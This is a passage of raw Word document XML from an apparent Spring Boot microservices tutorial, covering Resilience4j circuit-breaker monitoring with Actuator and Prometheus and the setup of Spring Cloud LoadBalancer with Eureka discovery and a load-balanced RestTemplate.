          <v:rect id="_x0000_i2781" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6893E193" w14:textId="28F54392" w:rsidR="0020778D" w:rsidRPr="00CE4B95" w:rsidRDefault="0020778D" w:rsidP="0020778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w:t>
      </w:r>
      <w:r w:rsidR="00AA7EC6" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Controller Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022706DA"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@RestController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3E7A04"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@RequestMapping</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api/products"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDBB45D"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roductControll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0A31426"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B48D0C4"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637DDCAC"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ProductService</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> productService</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E879ADB"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634CC4BC"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GetMapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13243FD5"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esponseEntity</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gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> getProduct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0B1988E"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esponseEntit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ok</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productServi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Products</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6836790B"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9EEAA2F" w14:textId="7466AA94"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29AB820A" w14:textId="47BC5901" w:rsidR="0020778D" w:rsidRPr="00CE4B95" w:rsidRDefault="0020778D" w:rsidP="0020778D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33A883D0" w14:textId="77777777" w:rsidR="0020778D" w:rsidRPr="00CE4B95" w:rsidRDefault="0020778D" w:rsidP="0020778D">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Monitoring with Spring Actuator + Resilience4j Dashboard (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D595A8" w14:textId="77777777" w:rsidR="0020778D" w:rsidRPr="00CE4B95" w:rsidRDefault="0020778D" w:rsidP="0020778D">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dd these to monitor circuit breaker metrics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39319CFF"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4802412"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">implementation </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'org.springframework.boot:spring-boot-starter-actuator'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F60B821" w14:textId="77777777"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4802412"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">implementation </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'io.github.resilience4j:resilience4j-micrometer'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09009D02" w14:textId="1A85598D" w:rsidR="00AA7EC6" w:rsidRPr="00CE4B95"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4802412"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">implementation </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'io.micrometer:micrometer-registry-prometheus'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FA7066" w14:textId="77777777" w:rsidR="0020778D" w:rsidRPr="00CE4B95" w:rsidRDefault="0020778D" w:rsidP="0020778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n you can expose endpoints like /actuator/metrics/resilience4j.circuitbreaker.calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7F3F8D" w14:textId="77777777" w:rsidR="0020778D" w:rsidRPr="00CE4B95" w:rsidRDefault="0020778D" w:rsidP="0020778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Advantages of Circuit Breaker Patter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26"/>
        <w:gridCol w:w="4320"/>
      </w:tblGrid>
      <w:tr w:rsidR="0020778D" w:rsidRPr="00CE4B95" w14:paraId="73812D16" w14:textId="77777777" w:rsidTr="0020778D">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1EB5B7ED" w14:textId="77777777" w:rsidR="0020778D" w:rsidRPr="00CE4B95" w:rsidRDefault="0020778D" w:rsidP="00226283">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Benefit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C5DBF50" w14:textId="77777777" w:rsidR="0020778D" w:rsidRPr="00CE4B95" w:rsidRDefault="0020778D" w:rsidP="00226283">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20778D" w:rsidRPr="00CE4B95" w14:paraId="665E224F" w14:textId="77777777" w:rsidTr="0020778D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DAB9AB4" w14:textId="77777777" w:rsidR="0020778D" w:rsidRPr="00CE4B95" w:rsidRDefault="0020778D" w:rsidP="0020778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Prevents overload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B5AD303" w14:textId="77777777" w:rsidR="0020778D" w:rsidRPr="00CE4B95" w:rsidRDefault="0020778D" w:rsidP="0020778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ops calling a failed service until it recovers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0020778D" w:rsidRPr="00CE4B95" w14:paraId="47D1B08B" w14:textId="77777777" w:rsidTr="0020778D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4457133B" w14:textId="77777777" w:rsidR="0020778D" w:rsidRPr="00CE4B95" w:rsidRDefault="0020778D" w:rsidP="0020778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Improves response time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B8992CD" w14:textId="77777777" w:rsidR="0020778D" w:rsidRPr="00CE4B95" w:rsidRDefault="0020778D" w:rsidP="0020778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turns fallback immediately instead of waiting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0020778D" w:rsidRPr="00CE4B95" w14:paraId="0FD05FEA" w14:textId="77777777" w:rsidTr="0020778D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="526E97D1" w14:textId="77777777" w:rsidR="0020778D" w:rsidRPr="00CE4B95" w:rsidRDefault="0020778D" w:rsidP="0020778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Enables graceful degradation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77C3062A" w14:textId="77777777" w:rsidR="0020778D" w:rsidRPr="00CE4B95" w:rsidRDefault="0020778D" w:rsidP="0020778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rs get default or cached response</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0020778D" w:rsidRPr="00CE4B95" w14:paraId="204BC98C" w14:textId="77777777" w:rsidTr="0020778D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47FC41CA" w14:textId="77777777" w:rsidR="0020778D" w:rsidRPr="00CE4B95" w:rsidRDefault="0020778D" w:rsidP="0020778D">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Helps monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3374BB8C" w14:textId="77777777" w:rsidR="0020778D" w:rsidRPr="00CE4B95" w:rsidRDefault="0020778D" w:rsidP="0020778D">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acks failure rates and transition states</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2B9EB41E" w14:textId="4EADB7BA" w:rsidR="00615C7B" w:rsidRPr="00CE4B95" w:rsidRDefault="00051071">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="675" w:name="_Toc196308155"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Load balancing in microservices using Spring Cloud Load Balancer</w:t>
      </w:r>
      <w:r w:rsidR="00615C7B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="675"/>
    </w:p>
    <w:p w14:paraId="0270BE8A" w14:textId="1F190A9C" w:rsidR="00615C7B" w:rsidRPr="00CE4B95" w:rsidRDefault="00615C7B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C0A57E3" w14:textId="77777777" w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w:rsidRDefault="00362AEA" w:rsidP="00362AEA">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lastRenderedPageBreak/>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What is Load Balancing in Microservices?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DA7628" w14:textId="77777777" w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w:rsidRDefault="00362AEA" w:rsidP="00362A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hen you have multiple instances of a microservice running (for fault tolerance, scalability, etc.), load balancing ensures that requests are evenly distributed among those instances.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF3BC71" w14:textId="77777777" w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00362A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0133D5E">
          <v:rect id="_x0000_i2782" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="579101B5" w14:textId="77777777" w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w:rsidRDefault="00362AEA" w:rsidP="00362AE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pring Cloud LoadBalancer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FB619B" w14:textId="77777777" w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w:rsidRDefault="00362AEA" w:rsidP="00362A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Cloud LoadBalancer is a lightweight, client-side load balancer that replaces Netflix Ribbon (now deprecated). It allows you to call microservices via service names instead of hardcoded URLs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DC63E0" w14:textId="77777777" w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00362A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D260403">
          <v:rect id="_x0000_i2783" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF09037" w14:textId="77777777" w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w:rsidRDefault="00362AEA" w:rsidP="00362AE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etup and Usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD99A52" w14:textId="77777777" w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w:rsidRDefault="00362AEA" w:rsidP="00362AE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Add Dependencies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19021DDF" w14:textId="77777777" w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w:rsidRDefault="00362AEA" w:rsidP="00362A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your Spring Boot app, include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9AE60D" w14:textId="77777777" w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w:rsidRDefault="00362AEA" w:rsidP="00362A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build.gradle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5778543B" w14:textId="77777777" w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w:rsidRDefault="00362AEA" w:rsidP="00362A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lementation 'org.springframework.cloud:spring-cloud-starter-loadbalancer'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE2D976" w14:textId="77777777" w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w:rsidRDefault="00362AEA" w:rsidP="00362AEA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E4432F3" w14:textId="77777777" w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w:rsidRDefault="00362AEA" w:rsidP="00362A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so make sure you have service discovery (e.g., Eureka):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21953FAF" w14:textId="77777777" w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w:rsidRDefault="00362AEA" w:rsidP="00362A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lementation 'org.springframework.cloud:spring-cloud-starter-netflix-eureka-client'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D294B5" w14:textId="77777777" w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w:rsidRDefault="00362AEA" w:rsidP="00362AE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Enable Discovery Client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9FAF5A" w14:textId="7777777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25292"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@SpringBootApplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C16CAF7" w14:textId="7777777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25292"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@EnableDiscoveryClient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21753335" w14:textId="7777777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25292"/>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App</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83A4B0D" w14:textId="7777777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2529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5F5E008C" w14:textId="7777777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2529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pringApplica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u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MyApp</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clas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p>
    <w:p w14:paraId="3447D7FF" w14:textId="7777777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25292"/>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EE9E79C" w14:textId="1EEE619A"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25292"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075EF04D" w14:textId="77777777" w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w:rsidRDefault="00362AEA" w:rsidP="00362AE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Inject LoadBalanced RestTemplate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062EB86D" w14:textId="7777777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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4965DD07" w14:textId="7777777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AppConfig</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63DD2E8E" w14:textId="7777777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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374FF5B2" w14:textId="7777777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Bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11918E06" w14:textId="7777777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LoadBalanced</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18024649" w14:textId="7777777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estTemplate</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> restTemplat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A4F2AA6" w14:textId="7777777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estTemplate</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A23EAC3" w14:textId="7777777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607E04A" w14:textId="1340386B"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7244A87C" w14:textId="77777777" w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w:rsidRDefault="00362AEA" w:rsidP="00362AE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Call Another Microservice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD55D5E" w14:textId="7777777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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@RestController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676BCC64" w14:textId="7777777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MyControll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D8D123D" w14:textId="7777777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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180175F2" w14:textId="7777777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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1678D8" w14:textId="7777777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RestTemplate</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> restTemplate</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7826A539" w14:textId="7777777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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
